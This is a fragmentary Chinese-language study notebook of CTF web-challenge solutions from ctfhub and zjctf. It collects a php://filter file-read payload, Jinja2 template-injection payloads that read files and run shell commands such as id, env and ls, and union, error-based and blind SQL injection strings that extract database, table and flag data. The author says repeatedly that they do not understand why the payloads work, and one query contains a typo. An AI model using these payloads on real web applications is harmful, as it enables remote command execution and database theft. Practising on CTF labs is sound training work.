正则过滤掉flag,而题目又提示了useless.php,所以用php://filter协议来读取useless.php,payload如下:?正则过滤是啥? ?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('在这里输文件名', 'r').read() }}{% endif %}{% endfor %}
命令执行
1
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('在这里输命令').read()") }}{% endif %}{% endfor %}
//啊,,说实话不太清楚啥叫poc,以及这是干什么的 //Proof Of Concept的缩写。在黑客圈指:观点验证程序,运行程序可得出预期的结果,也就验证了观点
1 2 3 4 5 6 7 8 9 10 11
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("id").read()') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}
打印环境变量
1 2 3 4 5 6 7 8 9 10 11
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("env").read()') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("ls").read()') }} //这里的ls就是需要的执行命令 {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}
先ls列出目录:
I ♥ Flask & application.py flag.txt requirements.txt static templates
-- 一行 SQL 语句 UPDATE user SET username='robot', password='robot' WHERE username = 'root'; -- 多行 SQL 语句 UPDATE user SET username='robot', password='robot' WHERE username = 'root';
-1 union select 1,group_concat(schema_name) from informations_schema.schemata
查询所有数据库名称
1 2 3
-1 union select 1,(select table_name from information_schema.tables where table_schema='sqli' limit 0,1) 查当前数据第一个表名,之后依次增加 limit 查询剩余表名
或者一次性查询所有表名
1
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
1 2
查询flag -1 union select 1,group_concat(flag) from sqli.flag
得到flag
///图是从ctfhub提供的wp里扣的(因为忘截图了,不想再花金币开
这个跟后面的比起来要短还能勉强看懂,,,,(只会用的程度///换个题就不会用了(大概率)
为什么为什么为什么要这样
为什么这么输可以出这种结果
显示结果的含义是什么
目前纯靠猜,,,
QWQ
每句话的含义是什么????
以后慢慢注释补充
2.字符型注入
[字符型注入]—ctfhub
手工(sqlmap待补充)
///下面出现的123可替换成任意数据库中不存在的用户名
输入1输出正常,回显ID,Data
联合查询得到数据库
1
123' union select database(),2 #
查表 得到表名
1
123' union select group_concat(table_name),3 from information_schema.tables where table_schema='sqli' #
查字段名 得到字段名
1
123' union select group_concat(column_name) ,3 from information_schema.columns where table_name='flag' #
查flag
1
123' union select flag,3 from sqli.flag #
得到flag
3.报错注入
[报错注入]—ctfhub
手工(sqlmap待补充)
查表名->报错->说明数据库下有多个表->用limit依次查找
1
?id=1 and(select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x)a)
查询错误: Subquery returns more than 1 row
1
?id=1 and(select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)
第二个表flag存有flag,这里拼接了一个1作为查询语句,因此要忽略 查询错误: Every derived table must have its own alias
查列名
1
?id=1 and(select 1 from(select count(*),concat((select column_name from information_schema.columns where table_name="flag"),floor(rand(0)*2))x from information_schema.tables group by x)a)
查询错误: Duplicate entry ‘flag1’ for key ‘group_key’
第二个表flag的列flag存有flag
查值
1 2 3
?id=1 and(select 1 from(select count(*),concat((select flag from flag),floor(rand(0)*2))x from information_schema.tables group by x)a) 查询错误: Duplicate entry 'ctfhub{8a213fb30ca8bc66650b5a93}1' for key 'group_key'
1.猜数据库名长度: x是某个值,用>x或<x也可 ’ and length (database())=x--+ 2.猜数据库名(任何系统函数可以知道的内容,例如Mysql、操作系统版本号等): ’ and left(database(),1)=’s’--+
3.获取数据库下的表:
1 2 3 4 5
' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 101--+ 4.获取表里的列名: ' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1)--+ 5.获取表里列的内容:x是错误返回值,只要不要给对的值,加啥都可 ' and ord(mid((select ifnull(cast(username as char),x)from security.users order by id limit 0,1),1,1))=68--+